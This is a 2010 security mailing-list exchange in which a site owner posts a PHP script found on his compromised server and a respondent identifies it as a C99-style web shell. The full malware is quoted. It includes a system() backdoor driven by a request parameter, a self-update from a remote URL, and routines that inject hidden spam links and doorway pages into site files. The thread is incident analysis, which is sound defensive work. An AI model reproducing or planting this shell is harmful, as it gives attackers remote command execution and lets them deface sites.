This is pretty heavily obscured (obviously), but the structure and
some of the things it's doing is reminiscent of PHP Shell, like C99.
Code like:
function Com()
{
if (isset($_POST['c']))
@system($_POST['c']);
if (isset($_GET['c']))
@system($_GET['c']);
}
Is used to pass things through the web-page to the server, allowing
the malicious user to control things more granularly.
I copied all the code you posted to a server and ran it through php at
the command line. If you add in something like $_POST['c'] = "ls >
test.txt" to the top of the file and run it, you'll find no output on
the page, but a nicely created test.txt file with the contents of the
directory containing this script...
Sad to say, looks like you were 0wned.
On Mon, Mar 1, 2010 at 3:16 AM, Adrian Crenshaw <[email protected]> wrote:
> Ok, I think one of my sites may have been compromised. I found the following
> PHP script on a site, but I'm not sure what it is trying to do. Anyone else
> ever seen this script before?
>
> Adrian
>
> <?php
> ignore_user_abort(1);
> set_time_limit(0);
>
> function Clear()
> {
> unlink("c");
> unlink("1r");
> unlink("log");
> }
>
> function Clear2()
> {
> $mrd = trim(file_get_contents("m"));
> $pt = "../$mrd";
> $fin = file_get_contents($pt);
> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
> $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin);
> $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin);
> $fin = ereg_replace("<!--dd4-->", "", $fin);
> $fin = ereg_replace("<!--dd5-->", "", $fin);
> $fin = ereg_replace("<font style=\"position: absolute;overflow:
> hidden;height: 0;width: 0\">", "", $fin);
> $fmrd = fopen($pt, "w+");
> fwrite($fmrd, $fin);
> fclose($fmrd);
> echo " upt-ok";
> }
>
> function GetVar($name, &$var)
> {
> $var = "";
> if (isset($_POST[$name]))
> $var = $_POST[$name];
>
> if (isset($_GET[$name]))
> $var = $_GET[$name];
>
> if (($var) =="")
> return false;
> else return true;
> }
>
> function Gen()
> {
> $alp = "abcdefghiklmnjsweqrtyuiopzx";
> $maps = array();
> if (isset($_POST["sg"]))
> $sg = $_POST["sg"];
>
> if (isset($_GET["sg"]))
> $sg = $_GET["sg"];
>
> if (isset($_POST["gm"]))
> $g = $_POST["gm"];
>
> if (isset($_GET["gm"]))
> $g = $_GET["gm"];
>
>
> $path = "";
> $fr = fopen("1r", "a+");
> if (file_exists("c"))
> {
> $fconf = file("c");
> $tname = trim($fconf[0]);
> $cname = trim($fconf[1]);
> $curs = trim($fconf[2]);
> $pid = trim($fconf[3]);
> if ($pid == 100)
> {
> $pid = 0;
> $rnd = mt_rand(0, 999);
> $nm = "";
> for ($i=0; $i<3; $i++)
> {
> $ran = mt_rand(0,26);
> $sym = $alp[$ran];
> $nm = $nm.$sym;
> }
> $cname = $nm;
> mkdir("$tname/$cname");
> $curs = $g;
> }
> }
> else
> {
> $rnd = mt_rand(0, 999);
> $nm = "";
> for ($i=0; $i<5; $i++)
> {
> $ran = mt_rand(0,26);
> $sym = $alp[$ran];
> $nm = $nm.$sym;
> }
> $tname = $nm;
> $pid = 0;
> $curs = $g;
> mkdir($tname);
> $fht = fopen("$tname/.htaccess", "w+");
> $htname = $sg."2.txt";
> $fp = fopen($htname, "r");
> $fin = '';
> while (!feof($fp))
> {
> $fc = fgets($fp, 1024);
> if (!$fc) break;
> $fin .= $fc;
> }
> fclose($fp);
> fwrite($fht, $fin);
> fclose($fht);
> $rnd = mt_rand(0, 999);
> $nm = "";
> for ($i=0; $i<3; $i++)
> {
> $ran = mt_rand(0,26);
> $sym = $alp[$ran];
> $nm = $nm.$sym;
> }
> $cname = $nm;
> mkdir("$tname/$cname");
> }
> $gname = $sg."sgen.php";
> for ($j=$pid; $j<$pid+10; $j++)
> {
> $fp = fopen($gname."?g=$curs", "r");
> $fin = '';
> while (!feof($fp))
> {
> $fc = fgets($fp, 1024);
> if (!$fc) break;
> $fin .= $fc;
> }
> fclose($fp);
>
> $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+");
> fwrite($fnd, $fin);
> fclose($fnd);
> }
>
> if ($j==100)
> {
> $fp = fopen($gname."?g=$curs&m=1", "r");
> $fin = '';
> while (!feof($fp))
> {
> $fc = fgets($fp, 1024);
> if (!$fc) break;
> $fin .= $fc;
> }
> fclose($fp);
> $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+");
> fwrite($fnd, $fin);
> fclose($fnd);
> $map = "$path/$tname/$cname/$curs"."_lm.htm";
> fwrite($fr,"$map\n");
> }
>
> $fconf = fopen("c", "w+");
> fwrite($fconf, $tname."\n");
> fwrite($fconf, $cname."\n");
> fwrite($fconf, $curs."\n");
> $nj = $j;
> fwrite($fconf, $nj."\n");
> fclose($fconf);
> }
>
> function Update()
> {
> $thisname = "1.php";
> if (isset($_POST['u']))
> $u = $_POST['u'];
>
> if (isset($_GET['u']))
> $u = $_GET['u'];
>
> $fp = fopen($u, "r");
> $fin = '';
> while (!feof($fp))
> {
> $fc = fgets($fp, 1024);
> if (!$fc) break;
> $fin .= $fc;
> }
> fclose($fp);
>
> $fthis = fopen($thisname, "w+");
> fwrite($fthis, $fin);
> fclose($fthis);
> }
>
> function Com()
> {
> if (isset($_POST['c']))
> @system($_POST['c']);
> if (isset($_GET['c']))
> @system($_GET['c']);
> }
>
> function UpKos()
> {
> $mrd = trim(file_get_contents("m"));
> $pt = "../$mrd";
> $fin = file_get_contents($pt);
> $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin);
> $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin);
> $fmrd = fopen($pt, "w+");
> fwrite($fmrd, $fin);
> fclose($fmrd);
> }
>
>
> function MRepl()
> {
> $mpt = "";
> $drs = "";
> $begtag = "<adsttnmq1><font style=\"position: absolute;overflow:
> hidden;height: 0;width: 0\">";
> $endtag = "</font></body></html><sdioyslkjs2> ";
> $mrd = trim(file_get_contents("m"));
> $pt = "../$mrd";
> $fin = file_get_contents($pt);
> GetVar("mpt", $mpt);
> // óäàëÿåì çàâåðøàþùèå õòìë òåãè
> $fin = preg_replace ("/<\/body>/i", "", $fin);
> $fin = preg_replace ("/<\/html>/i", "", $fin);
> $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
> $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin);
> $fp = fopen($mpt, "r");
> GetVar("drs", $drs);
> $fin = $fin.$begtag;
> $drs = str_replace("\\", "", $drs);
> $fin = $fin.$drs;
> $fin = $fin.$endtag;
> $fmrd = fopen($pt, "w+");
> fwrite($fmrd, $fin);
> fclose($fmrd);
> }
>
> function Main()
> {
> if (isset($_POST['u']) || isset($_GET['u']))
> {
> Update();
> exit();
> }
>
> if (isset($_POST['c']) || isset($_GET['c']))
> {
> Com();
> exit();
> }
>
> if (isset($_POST['uk']) || isset($_GET['uk']))
> {
> UpKos();
> exit();
> }
>
> if (isset($_POST['g']) || isset($_GET['g']))
> {
> Gen();
> exit();
> }
>
> if (isset($_POST['s']) || isset($_GET['s']))
> {
> MRepl();
> exit();
> }
>
> if (isset($_POST['cl']) || isset($_GET['cl']))
> {
> Clear();
> exit();
> }
>
> if (isset($_POST['cl2']) || isset($_GET['cl2']))
> {
> Clear2();
> exit();
> }
>
> echo "<ok>";
>
> }
>
> Main();
>
> ?>
>
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>
--
Andrew Ellis
http://blog.psych0tik.net
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
